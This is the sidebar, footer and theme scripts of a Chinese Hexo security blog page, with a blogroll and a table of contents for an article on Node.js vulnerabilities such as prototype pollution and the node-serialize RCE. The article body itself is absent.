                    <a href="imh0r1z0n.y@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://octoberfirst.github.io/" title="October's Blog" target="_blank">October's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://lamber.xyz/" title="Lamber's Blog" target="_blank">Lamber's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://p3rh4ps.top/" title="P3rh4ps's Blog" target="_blank">P3rh4ps's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://l0x1c.github.io/" title="L0x1c's Blog" target="_blank">L0x1c's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://5k1l.github.io" title="5K1L's Blog" target="_blank">5K1L's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://aidaip.github.io/" title="Aidai's Blog" target="_blank">Aidai's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://da4er.top/" title="Da4er's Blog" target="_blank">Da4er's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/yesec" title="烨安's Blog" target="_blank">烨安's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://coinc1dens.github.io" title="Coinc1dens's Blog" target="_blank">Coinc1dens's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://vaala.cat" title="VaalaCat's Blog" target="_blank">VaalaCat's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://15h3na0.xyz/" title="15h3na0's Blog" target="_blank">15h3na0's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.lhyerror404.cn/" title="ERROR404's Blog" target="_blank">ERROR404's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.zhaoj.in" title="glzjin's Blog" target="_blank">glzjin's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xmao.me" title="XMAO's Blog" target="_blank">XMAO's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://wordpress.jylsec.com/" title="姬扬灵's Blog" target="_blank">姬扬灵's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://ch4ser.top" title="ch4ser's Blog" target="_blank">ch4ser's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://forever404.cn" title="Forever404's Blog" target="_blank">Forever404's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.gtfly.top" title="gtfly's Blog" target="_blank">gtfly's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://theseus.top" title="Theseus's Blog" target="_blank">Theseus's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://nocbtm.github.io" title="Nocbtm's Blog" target="_blank">Nocbtm's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://sunny250.github.io" title="晴天's Blog" target="_blank">晴天's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://palmer0801.github.io/" title="Palmer's Blog" target="_blank">Palmer's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.lovei.org" title="腹黑's Blog" target="_blank">腹黑's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://62.234.155.106/wordpress" title="123qwer's Blog" target="_blank">123qwer's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://purecall.github.io/" title="VCT's Blog" target="_blank">VCT's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xz.aliyun.com/u/15779" title="VCT's XZ Blog" target="_blank">VCT's XZ Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://yikongge.github.io" title="小帽's Blog" target="_blank">小帽's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://brucetg.github.io" title="Brucetg's Blog" target="_blank">Brucetg's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.jianshu.com/u/9c3ca1ca4784" title="Cyc1e's Blog" target="_blank">Cyc1e's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.jianshu.com/u/7343624d69c4" title="Fish_o0O's Blog" target="_blank">Fish_o0O's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://h01k.github.io" title="Hook's Blog" target="_blank">Hook's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://1660351753.github.io" title="cop's Blog" target="_blank">cop's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://anemone.top/" title="Anemone's Blog" target="_blank">Anemone's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://guokeya.github.io" title="过客's Blog" target="_blank">过客's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.ragdoll.work/" title="咲夜南梦's Blog" target="_blank">咲夜南梦's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://Altman.vip" title="Altman's Blog" target="_blank">Altman's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://soreatu.com/" title="Soreat_u's Blog" target="_blank">Soreat_u's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://iihthan.com/" title="姚曜凌's Blog" target="_blank">姚曜凌's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.bertramc.cn/" title="berTrAM's Blog" target="_blank">berTrAM's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://rehml.cn/" title="花满楼's Blog" target="_blank">花满楼's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.chara.pub/blog" title="114's Blog" target="_blank">114's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="www.ximu.xyz" title="汐小白's Blog" target="_blank">汐小白's Blog</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-序言"><span class="nav-number">1.</span> <span class="nav-text">0x00 序言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-javascript大小写特性"><span class="nav-number">2.</span> <span class="nav-text">0x01 javascript大小写特性</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-js原型链污染"><span class="nav-number">3.</span> <span class="nav-text">0x02 js原型链污染</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#2-1prototype和proto"><span class="nav-number">3.1.</span> <span class="nav-text">2.1prototype和proto</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-2JavaScript原型链继承"><span class="nav-number">3.2.</span> <span class="nav-text">2.2JavaScript原型链继承</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-3原型链污染"><span class="nav-number">3.3.</span> <span class="nav-text">2.3原型链污染</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-4污染的应用情况"><span class="nav-number">3.4.</span> <span class="nav-text">2.4污染的应用情况</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-危险函数导致命令执行"><span class="nav-number">4.</span> <span class="nav-text">0x03 危险函数导致命令执行</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#3-1eval"><span class="nav-number">4.1.</span> <span class="nav-text">3.1eval()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-2类似命令"><span class="nav-number">4.2.</span> <span class="nav-text">3.2类似命令</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-node-serialize反序列化RCE漏洞-CVE-2017-5941"><span class="nav-number">5.</span> <span class="nav-text">0x04 node-serialize反序列化RCE漏洞(CVE-2017-5941)</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#4-1了解什么是IIFE："><span class="nav-number">5.1.</span> <span class="nav-text">4.1了解什么是IIFE：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-2node-serialize-0-0-4漏洞点"><span class="nav-number">5.2.</span> <span class="nav-text">4.2node-serialize@0.0.4漏洞点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-3构造Payload"><span class="nav-number">5.3.</span> <span class="nav-text">4.3构造Payload</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x05-Node-js-目录穿越漏洞复现-CVE-2017-14849"><span class="nav-number">6.</span> <span class="nav-text">0x05 Node.js 目录穿越漏洞复现(CVE-2017-14849)</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="86" src="//music.163.com/outchain/player?type=2&id=520716097&auto=1&height=66"></iframe>
    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Horizon</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>



<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共44.1k字</span>
</div>
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  



   <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;"></canvas> 
   <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
   <script type="text/javascript" src="/js/src/fireworks.js"></script>

</body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>